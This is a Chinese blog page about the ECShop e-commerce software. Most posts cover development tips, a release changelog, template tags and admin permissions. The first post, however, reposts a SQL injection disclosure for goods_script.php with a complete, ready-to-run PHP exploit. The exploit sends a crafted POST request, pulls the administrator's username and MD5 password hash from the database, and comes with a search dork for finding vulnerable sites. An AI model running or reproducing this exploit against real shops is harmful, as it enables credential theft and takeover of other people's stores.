小杜学习笔记 » ECSHOP

ECShop注射漏洞

小杜 — Tue, 24 Mar 2009 08:57:10 +0000

by Ryat
http://bbs.wolvez.org
2009-03-24

影响2.5.x和2.6.x,其他版本未测试

goods_script.php44行:
if (empty($_GET['type'])) { ... } elseif ($_GET['type'] == 'collection') { ... } $sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10); $res = $db->query($sql);

$sql没有初始化,很明显的一个漏洞:)

EXP:
#!/usr/bin/php

print_r(' +---------------------------------------------------------------------------+ ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit by puret_t mail: puretot at gmail dot com team: http://bbs.wolvez.org dork: "Powered by ECShop" +---------------------------------------------------------------------------+ '); /** * works with register_globals = On */ if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host: target server (ip/hostname) path: path to ecshop Example: php '.$argv[0].' localhost /ecshop/ +---------------------------------------------------------------------------+ '); exit; }


error_reporting(7);

ini_set('max_execution_time', 0);
$host = $argv[1];

$path = $argv[2];
$resp = send();

preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);
if ($hash)

    exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");

else

    exit("Exploit Failed!\n");
function send()

{

    global $host, $path;
    $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';
    $data = "POST ".$path."goods_script.php?type=".time()."  HTTP/1.1\r\n";

    $data .= "Accept: */*\r\n";

    $data .= "Accept-Language: zh-cn\r\n";

    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";

    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

    $data .= "Host: $host\r\n";

    $data .= "Content-Length: ".strlen($cmd)."\r\n";

    $data .= "Connection: Close\r\n\r\n";

    $data .= $cmd;
    $fp = fsockopen($host, 80);

    fputs($fp, $data);
    $resp = '';
    while ($fp && !feof($fp))

        $resp .= fread($fp, 1024);
    return $resp;

}

?>

给ecshop留言本增加审核功能

小杜 — Wed, 26 Nov 2008 05:38:01 +0000

原帖发表于ECshop官方论坛 http://bbs.ecshop.com/thread-69730-1-1.html

新版ECshop(V2.61)增加了留言板功能，这个是很有用的，但是在论坛上看到有朋友说，需要审核功能，而官方没有给出，就去看了看这个新版的留言本功能.
留言本前台程序是message.php , 后台仍然在会员管理-会员留言菜单下。数据表在ecs_feedback，控制留言是否显示的字段为msg_area
程序十分简单，留言默认提交时 msg_area为1，所以就直接显示了，增加审核功能，无非就是在提交时候将msg_area设置为0，在后台管理处增加审核按钮，执行一个将该字段设置为1的动作即可
1- 打开message.php,找到79行 ‘msg_area’ => 1 将其修改为 ‘msg_area’ => 0
2- 打开admin/user_msg.php ，在适当的位置添加如代码：
if ($_REQUEST['act']==’checked’) { /* 权限判断 */ admin_priv(’feedback_priv’); $id = empty($_GET['id']) ? 0 : intval($_GET['id']); $sql = ‘UPDATE’. $ecs->table(’feedback’).’ SET msg_area =1 WHERE msg_id =’.$id; $db->query($sql);

/* 返回列表 */ $link[] = array(’text’ => $_LANG['go_back'], ‘href’ =>‘javascript:history.back(-1)’); sys_msg($_LANG['attradd_succed'], 0, $link); // ecs_header(”Location: user_msg.php?act=list_all\n”); exit; }
3- 修改模板文件 admin/templates/msg_list.htm, 在

之后增加代码

好了，审核功能就实现了。
其实这个功能非常的简单，之所以写下来，是想表达一个想法：不管需求大小，对于真正需要它的人，都是重要的。
其实每个ECshop的功能扩展，都是这样的步骤，希望大家都能来感受一下亲手DIY的乐趣，这也是我非常喜欢EC的原因

ECShop V2.6.1 发布了

小杜 — Fri, 31 Oct 2008 08:21:14 +0000

好久没有新版本更新了，本次更新最大的喜讯可能就是不再绑定Ucenter了

不过这是针对那些网店主而言的，对于我们关注程序的人来说更多的是他的新增功能和修复

列表如下：

ChangeLog：

[新增] 新增按配送方式打印配送单的功能
[新增] 新增订单列表页能直接显示订单下的商品及缩图的功能
[新增] 新增网站留言板功能
[新增] 新增网站报价单功能
[新增] 新增新的分页显示方式,用户可以指定分页的显示方式
[新增] 导出CSV文件时允许用户自定义导出字段及顺序
[新增] 新增与UCenter整合后的积分兑换的功能
[新增] 新增全部品牌展示的页面
[新增] 新增在首页促销模块显示分类下的推荐商品的功能
[新增] 新增lib_base.php用来存储基础函数
[新增] 新增上传商品是否自动生成相册图的开关设置
[新增] 新增上传商品时是否保留原图的开关设置
[新增] 新增首页推荐商品排序的选项
[新增] 新增下订单时是否给客服发邮件的开关设置
[新增] 新增是否开启会员邮件验证的开关设置
[新增] 新增是否关闭会员注册的开关设置
[新增] 新增购物车里显示商品方式的选项
[新增] 新增购物车里是否显示商品属性的开关设置
[新增] 新增首页FLASH样式选择的功能
[变更] 会员整合由强制UC整合变更为插件形式
[变更] SQL缓存方式变更为静态文件存储
[变更] 相册存储目录变更，能够快捷的找到商品对应的图片
[变更] 商品属性允许复选属性购物加价
[变更] 商品图片允许调用外部图片链接
[变更] 图片批量处理时增加可选择范围，能够对选定的部分商品图片进行单独处理
[变更] 允许用户在添加商品时指定购物返还的等级积分
[变更] 热门搜索关键词调整为全站均可显示
[变更] 购物流程参数调整为GET方式以方便用户借助三方工具统计订单信息
[变更] 支付插件网银在线改用订单号传递唯一编号
[变更] 自动记录用户上次添加/修改商品时所选择的分类
[变更] 拍卖活动允许进行无封顶拍卖
[变更] 商品相册使用FLASH播放显示
[变更] 订单搜索时增加付款中状态
[变更] 给店主发送订单邮件时,增加更多有关订单详情的内容
[变更] 导出CSV文件时允许对商品进行选择式导出
[变更] 缓存及备份文件放入到TEMP文件夹下
[变更] 品牌页标题变更,优化SEO
[变更] 销售排行中库存数量为0时，不再继续显示
[变更] 顺丰快递更改查询发货单号地址
[修正] 修改选购中心属性过多时，用户一旦筛选属性就会造成mysql锁表的错误
[修正] 修改生成的商品列表时页面编码的错误
[修正] 修改订单”前一个订单”，”后一个订单”查找结果的错误
[修正] 修改批量处理商品图时，原图被删除的错误
[修正] 修改后台分成管理页面的从”第一页”点”下一页”没有响应的错误
[修正] 修改配送方式新增配送区域模板的错误
[修正] 修改使用重写时Feed生成的商品链接参数不正确的错误
[修正] 修改wap部分编码没有转换的错误
[修正] 修改推荐分成log记录显示用户ID不正确的错误
[修正] 修改高级搜索页面的商品列表显示不正确的错误
[修正] 修改倒计时使用的时间为用户机器时间的错误
[修正] 修改进入团购购物车后再购买其他商品时返回的积分不正确的错误
[修正] 修改会员推荐商品代码乱码修复的错误
[修正] 修改mysql扩展插入时不自动截断的错误
[修正] 修改会员生日与前台不一致的错误
[修正] 修改用户中心订单中的放回购物车不能按会员价计算的错误

已经下载了，晚上回去测试……

Ecshop的模板标签

小杜 — Wed, 22 Oct 2008 04:46:24 +0000

Ecshop的模板标签

经常在ec的论坛看到要求官方发布EC模板标签列表的呼声，甚至有热心网友也在整理一些标签列表
其实我知道，很多希望制作模板的人，就是因为对标签的不熟悉，无法下手
今天我就来说一说，官方为什么不能给这个列表，以及教会你怎么掌握EC的模板机制，通过这篇文章，你就不再需要官方发布什么”标签列表”就能随心所欲的使用EC的标签，制作你的模板了！
通过一个小例子来解释一下EC模板运行的大致原理。比如登录用户中心我们看到的第一句话:“admin,欢迎你回到ecshop”。
先来看一下EC的模板是怎么做的，代码如下：

复制内容到剪贴板

代码:

`{$info.username} {$lang.welcome_to} {$info.shop_name}！`

这里的标签{$info.username} 是怎么来的呢？

简单说一下EC模板工作原理：
假设在new.php文件里有这样一段代码

复制内容到剪贴板

代码:

$username = "xiaodu"; $smarty->assign('myname', $username); $smarty->display('new.htm');

那么我们在设计new.htm的时候就可以使用{$myname}这个标签了，运行new.php将显示：xiaodu

PHP程序就是这样和模板挂起钩的，这样大家就应该明白为什么没有所谓的标签列表了吧。你可以任意的定义任何你想要的变量到你的模板！

ECshop订单操作权限的开发

小杜 — Mon, 13 Oct 2008 02:46:15 +0000

————————————————————————————–
作者：xiaodu

发表： 2008-9-21

网站： http://www.eblhost.cn/forum/viewthread.php?tid=18
————————————————————————————–

ECshop是当前最流行的电子商城软件，而且由于完全开源，对于我们二次开发出符合我们自身特点的系统，非常有利。下面就以一个简单的实例，描述一次关于订单操作权限的添加过程。

一基础知识

首先我们需要了解以下一些基本的知识：
1.ECshop的所有可用权限列表存储在数据库’ecs_admin_action’表中
2.权限判断通过admin_priv函数实现
3.管理员的权限设置可以通过后台编辑管理员信息来分配

二权限详解

1、商品管理，共有9个权限项目，以下分别是：
goods_manage,商品添加/编辑
remove_back,商品删除/恢复
cat_manage,分类添加/编辑
cat_drop,分类转移/删除
attr_manage,商品属性管理
brand_manage,商品品牌管理
comment_priv,用户评论管理
tag_manage,标签管理
goods_type,商品类型

2、文章管理，共有6个权限项目，以下分别是：
article_cat,文章分类管理
article_manage,文章内容管理
shopinfo_manage,网店信息管理
shophelp_manage,网店帮助管理
vote_priv,在线调查管理
topic_manage,专题管理

3、会员管理，共有8个权限项目，以下分别是：
feedback_priv,会员留言管理
integrate_users,会员数据整合
sync_users,同步会员数据
users_manage,会员管理
users_drop,会员删除
user_rank,会员等级管理
surplus_manage,会员余额管理
account_manage,会员账户管理

4、权限管理，共有7个权限项目，以下分别是：

template_manage,模板管理
admin_manage,管理员添加/编辑
admin_drop,删除管理员
allot_priv,分派权限
logs_manage,管理日志列表
logs_drop,删除管理日志
agency_manage,办事处管理

5、系统设置，共有9个权限项目，以下分别是：
shop_config,商店设置
ship_manage, 配送方式管理
payment,支付方式管理
shiparea_manage,配送区域管理
area_manage,地区列表管理
friendlink,友情链接管理
db_backup,数据库备份
db_renew,数据库恢复
flash_manage，Flash 播放器管理

6、订单管理，共有10个权限项目，以下分别是：
order_os_edit,编辑订单状态
order_ps_edit,编辑付款状态
order_ss_edit,编辑发货状态
order_edit,添加编辑订单
order_view,查看未完成订单
order_view_finished,查看已完成订单
repay_manage,退款申请管理
booking,缺货登记管理
sale_order_stats,订单销售统计
client_flow_stats,客户流量统计
7、促销管理，共有6个权限项目，以下分别是：
snatch_manage,夺宝奇兵
ad_manage,广告管理
gift_manage,赠品管理
card_manage,祝福贺卡
pack,商品包装
bonus_manage,红包管理

三订单操作权限的开发

上面提到的权限列表是我们比较常用的一些，我们具体来看下针对订单操作权限，主要是

order_os_edit,编辑订单状态
order_ps_edit,编辑付款状态
order_ss_edit,编辑发货状态
order_edit,添加编辑订单
order_view,查看未完成订单

假如我们某一个管理员需要”PDF打印订单”权限，(假设”PDF打印”功能已经实现），我们来看以下具体的操作步骤

1.首先在数据库ecs_admin_action中插入一行code为”pdf_manage”，parents_id为6(sql语句）

2.在language/admin/priv_action.php中找到”//订单管理部分权限”，在下面新加一行
$_LANG['pdf_manage'] = ‘PDF打印管理’;
3.在后台编辑某管理员权限页面，我们可以看到这个选项，分配给他。

当然这个时候该管理员还没有真正拥有这个权限。打开admin/order.php 搜索$priv_list(大概在2950行)
修改代码为以下部分:

/* 取得订单操作权限 */
$actions = $_SESSION['action_list'];
if ($actions == ‘all’)
{
$priv_list  = array(’os’ => true, ’ss’ => true, ‘ps’ => true, ‘edit’ => true,‘pdf_manage’=>true);
//如果是拥有所有权限(比如admin)，分配他PDF打印权限，当然如果你希望是特定的某一个人，这行可以不加
}
else
{
$actions = ‘,’ . $actions . ‘,’;
$priv_list  = array(
‘os’ => strpos($actions, ‘,order_os_edit,’) !== false,
’ss’ => strpos($actions, ‘,order_ss_edit,’) !== false,
‘ps’ => strpos($actions, ‘,order_ps_edit,’) !== false,
‘edit’  => strpos($actions, ‘,order_edit,’) !== false,
‘pdf_manage’  => strpos($actions, ‘,pdf_manage,’) !== false

);
}
if ($priv_list['pdf_manage'])
{
$list['pdf_manage'] = true; // 确认
}
最后，在模板admin/templates/order_info.htm中找到合适的位置添加如下代码：
{if $operable_list.pdf_manage}

{/if}
好了一次简单的”订单操作权限”扩展功能就完成，接下来该做什么了呢？呵呵，还不是该去喝口茶的时候
测试–花费更多的时间测试以保证你所做的一切是可用的。这个更重要~

(注：以上代码均以ECshop当前最新版本2.60为基础）